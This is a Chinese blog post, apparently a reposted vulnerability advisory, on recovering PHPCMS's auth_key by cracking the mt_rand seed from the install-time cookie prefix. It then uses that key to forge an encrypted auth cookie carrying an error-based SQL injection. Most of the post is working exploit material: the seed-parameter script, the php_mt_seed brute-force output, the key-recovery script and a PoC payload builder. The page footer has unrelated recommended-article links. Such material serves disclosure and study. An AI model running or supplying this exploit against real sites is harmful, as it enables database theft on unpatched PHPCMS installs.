php获得auth_key漏洞,PHPCMS authkey泄露导致注入

最新推荐文章于 2023-09-11 17:53:44 发布
最新推荐文章于 2023-09-11 17:53:44 发布
阅读量973 收藏
点赞数
文章标签: php获得auth_key漏洞

发布时间:2017-04-28

公开时间:N/A

漏洞类型:sql注入

危害等级:高

漏洞编号:xianzhi-2017-04-93356191

测试版本:N/A

漏洞详情

install/install.php 184行

if($module == 'admin') {

$cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'';

$authkey = random(20, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

安装过程中初始化的2个随机值 一个是cookie前缀 一个是牛逼的auth_key

来看看random函数

function random($length, $chars = '0123456789') {

$hash = '';

$max = strlen($chars) - 1;

for($i = 0; $i < $length; $i++) {

$hash .= $chars[mt_rand(0, $max)];

}

return $hash;

}

可以看到使用mt_rand来生成随机数

mt_rand有个坑 研究过的人不少 就是随机数种子不是很强可以被爆破,而且php在一次访问中只会自动播种一次种子。看上面,在这一次访问中 共调用了5+20次mt_rand 而且前5次的值可知(cookie前缀),足够我们计算出随机数种子从而自己计算auth_key的值

利用过程

首先注册个账号 记录cookie值 比如我这里

oitzp__userid:4426Os84BFz69iT0YQjGWpPEtQp4niK3SXOJLwKA

oitzp就是cookie_pre

先用个小脚本生成参数

$s = 'oitzp';

$str = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ';

echo crack($s,$str);

function crack($s,$str){

for($i=0;$i

echo strpos($str,$s[$i])." ".strpos($str,$s[$i])." 0 51 ";

}

}

得到

14 14 0 51 8 8 0 51 19 19 0 51 25 25 0 51 15 15 0 51

开始爆破

./php_mt_seed 14 14 0 51 8 8 0 51 19 19 0 51 25 25 0 51 15 15 0 51

大概几分钟后得到结果

Pattern: EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52 EXACT-FROM-52

Found 0, trying 33554432 - 67108863, speed 25228896 seeds per second

seed = 62227301

Found 1, trying 369098752 - 402653183, speed 26383041 seeds per second

seed = 392301305

seed = 393361608

Found 3, trying 738197504 - 771751935, speed 25992869 seeds per second

seed = 762840031

Found 4, trying 872415232 - 905969663, speed 25995686 seeds per second

seed = 903576050

Found 5, trying 1610612736 - 1644167167, speed 26116632 seeds per second

seed = 1625886859

Found 6, trying 1677721600 - 1711276031, speed 26120529 seeds per second

seed = 1708791794

Found 7, trying 1845493760 - 1879048191, speed 26121638 seeds per second

seed = 1850496645

Found 8, trying 2315255808 - 2348810239, speed 26072700 seeds per second

seed = 2327183983

Found 9, trying 2449473536 - 2483027967, speed 26049915 seeds per second

seed = 2453737360

Found 10, trying 2818572288 - 2852126719, speed 26083400 seeds per second

seed = 2821134341

Found 11, trying 3187671040 - 3221225471, speed 26049448 seeds per second

seed = 3195112468

Found 12, trying 3321888768 - 3355443199, speed 26056073 seeds per second

seed = 3355185931

Found 13, trying 3355443200 - 3388997631, speed 26029347 seeds per second

seed = 3370877999

Found 14, trying 3623878656 - 3657433087, speed 25983212 seeds per second

seed = 3635705652

Found 15, trying 3959422976 - 3992977407, speed 25973648 seeds per second

seed = 3976924131

Found 16, trying 4060086272 - 4093640703, speed 25997863 seeds per second

seed = 4070165693

Found 17, trying 4261412864 - 4294967295, speed 26030253 seeds per second

Found 17

总共有17个可能的随机数种子 收集一下丢给下一个脚本

$seeds = array(62227301,392301305,393361608,762840031,903576050,1625886859,1708791794,1850496645,2327183983,2453737360,2821134341,3195112468,3355185931,3370877999,3635705652,3976924131,4070165693);

for($i=0;$i<17;$i++){

mt_srand($seeds[$i]);

$cookie_pre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'';

$auth_key = random(20, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');

if (authcode("4426Os84BFz69iT0YQjGWpPEtQp4niK3SXOJLwKA","DECODE",$auth_key) == "1"){

//上面的1是注册的uid

//可以从index.php?m=member&c=index&a=account_manage_info&t=1拿到

echo $seeds[$i]."\n".$auth_key;

}

}

得到结果:

3370877999

fkedKUovc9hFpKvX0hcH

就这么分分钟拿到可auth_key

简单演示下注入

phpcms/modules/member/class/foreground.class.php 19行

final public function check_member() {

$phpcms_auth = param::get_cookie('auth');

if(ROUTE_M =='member' && ROUTE_C =='index' && in_array(ROUTE_A, array('login', 'register', 'mini','send_newmail'))) {

if ($phpcms_auth && ROUTE_A != 'mini') {

showmessage(L('login_success', '', 'member'), 'index.php?m=member&c=index');

} else {

return true;

}

} else {

//判断是否存在auth cookie

if ($phpcms_auth) {

$auth_key = $auth_key = get_auth_key('login');

list($userid, $password) = explode("\t", sys_auth($phpcms_auth, 'DECODE', $auth_key));

//验证用户,获取用户信息

$this->memberinfo = $this->db->get_one(array('userid'=>$userid));

$userid来自cookie且经过2次sys_auth加密 无视防御

poc:

$str = "1' and (extractvalue(1,concat(0x7e,(select user()),0x7e)));#\tasdf";

$en1 = authcode($str,"ENCODE",get_auth_key("login"));

$en2 = authcode($en1,"ENCODE",'fkedKUovc9hFpKvX0hcH');//刚才拿到的auth_key

echo urlencode($en2);

function get_auth_key($prefix,$suffix="") {

if($prefix=='login'){

$pc_auth_key = md5('fkedKUovc9hFpKvX0hcH'.'192.168.199.171');//本机IP

}else if($prefix=='email'){

$pc_auth_key = md5('fkedKUovc9hFpKvX0hcH');

}else{

$pc_auth_key = md5('fkedKUovc9hFpKvX0hcH'.$suffix);

}

$authkey = md5($prefix.$pc_auth_key);

return $authkey;

}

修改cookie oitzp_auth值为生成的payload

访问/index.php?m=member即可看到报错信息

87d4d2b3ad0d

view.png

王枝节
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php使用Header函数,PHP_AUTH_PW和PHP_AUTH_USER做用户验证
10-22
主要介绍了php使用Header函数,PHP_AUTH_PW和PHP_AUTH_USER做用户验证的方法,结合实例形式分析了PHP使用Header函数调用登录验证及PHP_AUTH_PW和PHP_AUTH_USER进行验证处理的相关技巧,需要的朋友可以参考下
php auth_http类库进行身份效验
10-30
`auth_http` 类库是PHP中一个用于实现HTTP基本认证(Basic Authentication)和digest认证(Digest Authentication)的工具,它依赖于`auth` 类库。在本文中,我们将深入探讨如何使用`auth_http` 类库进行身份验证,...
php sys auth,phpcms_v9 authkey注入
weixin_34109083的博客
03-13 214
[PHP] 纯文本查看 复制代码
小米手环6获取auth_key更换第三方表盘(零基础)
qq_42296266的博客
06-13 3255
小米手环6获取auth_key,真正零基础哦!!
漏洞检测与防御:Redis未授权访问漏洞复现
Liu_Bruce的博客
04-21 1998
漏洞检测与防御:Redis未授权访问漏洞复现 1. 未授权访问漏洞 未授权访问漏洞可以理解为安全配置、权限认证、授权页面存在缺陷,导致其他用户可以直接访问,从而引发权限可被操作,数据库、网站目录等敏感信息泄露。目前存在未授权访问漏洞的服务主要包括:NFS 、Samba、LDAP、Rsync、FTP、GitLab、Jenkins、MongoDB、Redis、ZooKeeper、ElasticSearch、Memcache、CouchDB、Docker、Solr、Hadoop等,使用时要注意。本文复现Redi
ios小米手环6最新固件获取auth_key更换第三方表盘
cMeCool的博客
10-20 1万+
iphone 小米手环6最新固件(1.0.5.24)获取auth_key 更换第三方表盘 amaztools 软件给的解决方法 点我前往 How to get the key with Python If you really can't, then you can try running this program on your computer. ATTENTION: to be able to run this program you must have knowledge of computer
【教程】万字长文保姆级教你制作自己的多功能QQ机器人
热门推荐
xfxuezhang.cn
09-02 2万+
篇幅较长且保姆级详细,建议收藏后慢慢看。
phpcmsV9.6.0sql注入漏洞分析
shelter1234567的博客
09-11 1368
本次分析phpcmsV9.6.0 的sql注入漏洞,过程很曲折,就像cc链一样,要一步一步找到利用的链。纯手动分析没有软件调试,中间找类啊,方法啊 ,都是按照代码流程写的流程分析的,对自己也是一个挑战吧!
request_key_auth.rar__auth.requestToken
09-14
Request key authorisation token key definition for linux.
解决更改AUTH_USER_MODEL后出现的问题
09-16
在Django框架中,`AUTH_USER_MODEL`是一个重要的设置,用于指定自定义用户模型。默认情况下,Django使用`auth.User`模型来处理用户身份验证和授权,但有时我们需要根据项目需求扩展用户模型,比如添加更多的字段或...
PHPCMS V9.1.13 正式版盛大发布[最后更新:20120129]
04-05
PHPCMS V9(简称V9)采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP(面向对象)方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展,代码维护,优秀的二次开发能力,可满足所有网站的应用需求。 这是UTF8的压缩包
phpcmsv9 authkey泄露导致SQL注入漏洞
weixin_30301183的博客
03-05 923
phpcmsv9 authkey泄露导致SQL注入漏洞 http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJX...
phpcms漏洞总结
草巾冒小子的博客
06-25 6788
本文旨在phpcms常见漏洞的发现与修复 重点内容 : 这里收录了phpcms一些常见的漏洞和补丁方案。 希望能对学习该框架的程序员,有所助益。
kingcms php 漏洞,phpcmsV9.6 getshell
weixin_35817939的博客
03-13 306
这个漏洞来自乌云,经过本地环境测试后,发现漏洞确实存在。详细说明:PHP双字节编码,这个本不应该出现的问题,或许因为过去太久远快被遗忘了,phpcms从20140929的v9.5.9版本起,增加了mysqli的支持,因为编写疏忽,导致该问题又重现江湖。漏洞本身无需细说。phpcms默认使用mysqli数据库,显示mysql语句错误(debug为true,呵呵完全可以爆错注入),而且安装过程不能修改...
PHPCMS某处设计缺陷可致authkey泄露
aixuan9365的博客
05-25 406
在分析几个phpcms漏洞就换分析其他的,换换口味。 漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0106892.html swfupload上传页面输出了 MD5(auth_key+sess_id)。 函数位于 /phpcms/modules/attachment/functions/global.func.php...
漏洞案例】记一次aws-key泄露导致火币交易所被攻击案例
Websec
07-03 1214
全球最大的加密货币交易所之一火币悄然修复了一个数据泄露事件,该泄露事件可能导致该公司的云存储被访问。在我检查开放的 Amazon Web Services (AWS) S3 存储桶时,我发现了一个包含 AWS 凭证的敏感文件。不幸的是,在这种情况下,我不能断定火币已经很好地完成了他们的工作。泄露自己的亚马逊凭证已经够糟糕的了,但花了几个月的时间才得到回应,即便如此,火币还是选择将凭证留在网上。在下面的屏幕截图中,我将一个文件上传到火币用来存储和分发 Android 应用程序的 CDN。
PHPCMS MT_RAND SEED CRACK致authkey泄露
测试
05-13 477
正文看到phpcms更新了, 看了下补丁, 分析了下他修复的漏洞。 这种漏洞在CTF中还是比较常见的, 实例我还是第一次遇到。 在INSTALL.PHP中 1 $cookie_pre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').'_'; $auth_key = random(20, '129456...
phpcms获取auth_key漏洞
收集盒 Book box
08-21 2756
1.  为所欲为漏洞: 注册登录后访问 http://localhost:8038/study/phpcms/index.php?m=member&c=index&a=account_manage_avatar&t=1 查看源文件:     拿到这个:        aHR0cDovL2xvY2FsaG9zdDo4MDM4L3N0d
【kong系列六】之关键字认证key_auth插件
|] 大世界,小人物
08-18 6943
key_auth 该插件很简单,利用提前预设好的关键字名称,如下面设置的keynote = apices,然后为consumer设置一个key-auth 密钥,假如key-auth=test@keyauth。 在请求api的时候,将apikey=test@keyauth,作为一个参数附加到请求url后,或者放置到headers中。
nacos_auth_identity_key
最新发布
09-17
nacos_auth_identity_key是Nacos身份验证模块中的一个关键参数,用于标识身份验证的密钥。 在Nacos中,身份验证是指通过一定的机制来验证用户的身份,确保只有经过授权的用户可以进行相应的操作。nacos_auth_identity_key就是这一机制中使用的密钥,用来提供安全性保障。 nacos_auth_identity_key是一个重要的配置项,在Nacos的配置文件中可以进行设置。当启用了身份验证模块后,系统会基于该密钥来验证用户的权限。只有在用户提供了正确的密钥后,才能成功进行相应的操作,从而保证系统的安全性。 初始情况下,nacos_auth_identity_key的值是一个空字符串,表示没有启用身份验证。但是为了保证系统的安全性,建议在生产环境中设置一个复杂且不容易被猜测到的密钥。可以使用随机生成的字符串作为密钥,长度为16至128个字符之间,包括数字、字母和特殊符号。 通过设置一个强大的nacos_auth_identity_key,可以防止未经授权的用户访问和操作Nacos系统,提高系统的安全性和稳定性。同时,用户也可以在有需要的时候,更改密钥来增加系统的安全性。 综上所述,nacos_auth_identity_key是Nacos身份验证模块中的关键参数,用于标识身份验证的密钥,保证系统的安全性和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值